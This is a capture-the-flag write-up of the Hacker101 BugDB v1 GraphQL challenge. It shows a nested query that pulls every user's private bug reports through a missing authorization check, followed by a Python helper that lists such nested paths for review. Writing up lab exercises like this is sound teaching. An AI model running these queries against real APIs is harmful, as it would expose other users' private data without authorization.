ctf.hacker101 — BugDB v1

Erkan Kılıç
Jan 23, 2021


We start the exercise by clicking the GO option at the end of the exercise title on https://ctf.hacker101.com/ctf

The exercise opens an empty GraphQL[1] screen, and we read through the “DOCS” pane on the right side step by step.
We start by writing our own query with a unique name. Of course, this query returns no result because it is empty.

query tumkullanicilar{
}

The reference docs offer a lot of fields to select. We choose “allUsers” to retrieve information about all users.
Under the “allUsers” tab there are “UserConnection” and “Arguments” sections. We continue with “UserConnection”, where we now have “pageInfo: PageInfo!”, which is related to pagination, and “edges: [UsersEdge]!”, which has nodes holding further information.
We select “node: Users” because we think it could be related to user information, and there we see an “implements” section and a “fields” section.
In the “id” section there are two options, and we decided to continue with “username: String”.

Finally, our query looks like

query tumkullanicilar {
  allUsers {
    edges {
      node {
        id: username
      }
    }
  }
}

And the result is

{
  "data": {
    "allUsers": {
      "edges": [
        {
          "node": {
            "id": "admin"
          }
        },
        {
          "node": {
            "id": "victim"
          }
        }
      ]
    }
  }
}

But this does not contain the information we are looking for, so we changed the query by working backwards step by step.
First of all, we go back one step and change the node selection to the second choice, “bugs”. Under “bugs” there is a “BugsConnection”.
We know from “UserConnection” how we selected “node: Users”, so here we select “node: Bugs_”.
In the “id” section there are a lot of options, and we decided to continue with “text: String”.

And our new query is

query tumkullanicilar {
  allUsers {
    edges {
      node {
        bugs {
          edges {
            node {
              id: text
            }
          }
        }
      }
    }
  }
}

RESULT: The flag was captured.
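
The manual walk through the DOCS pane above (allUsers, edges, node, bugs, edges, node, text) can be reproduced as a reachability check over the schema, which is how a reviewer would list every nested path whose resolver needs its own authorization check. This is an added example, not part of the original write-up: the schema dictionary is constructed from the type names mentioned above, and `BugsEdge` and the `reporter` back-reference are assumptions.

```python
# Constructed schema: type and field names follow the DOCS walk-through above.
# "BugsEdge" and the "reporter" back-reference are assumptions for illustration.
SCHEMA = {
    "Query": {"allUsers": "UserConnection"},
    "UserConnection": {"pageInfo": "PageInfo", "edges": "UsersEdge"},
    "PageInfo": {},
    "UsersEdge": {"node": "Users"},
    "Users": {"id": "ID", "username": "String", "bugs": "BugsConnection"},
    "BugsConnection": {"edges": "BugsEdge"},
    "BugsEdge": {"node": "Bugs_"},
    "Bugs_": {"id": "ID", "text": "String", "reporter": "Users"},
}


def leaf_paths(schema, type_name="Query", path=(), seen=()):
    """Yield (path, owning_type) for every scalar field reachable from type_name."""
    visited = seen + (type_name,)
    for field, target in schema.get(type_name, {}).items():
        here = path + (field,)
        if target not in schema:
            # Target is not an object type in the schema, so it is a scalar leaf.
            yield here, type_name
        elif target not in visited:
            # Object type: descend, but never re-enter a type already on this path.
            yield from leaf_paths(schema, target, here, visited)


def paths_to_type(schema, sensitive_type):
    """Dotted paths from the root that end in a scalar owned by sensitive_type."""
    return [".".join(p) for p, owner in leaf_paths(schema) if owner == sensitive_type]


def to_query(path):
    """Render one field path as the nested GraphQL selection that requests it."""
    body = path[-1]
    for field in reversed(path[:-1]):
        body = f"{field} {{ {body} }}"
    return f"query {{ {body} }}"


if __name__ == "__main__":
    # Every path printed here crosses from one user's record into bug data,
    # so each hop's resolver must check what the caller is allowed to see.
    for dotted in paths_to_type(SCHEMA, "Bugs_"):
        print(dotted)
        print("  ", to_query(tuple(dotted.split("."))))
```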

REFERENCES
[1] GraphQL IDE Monorepo, https://github.com/graphql/graphiql
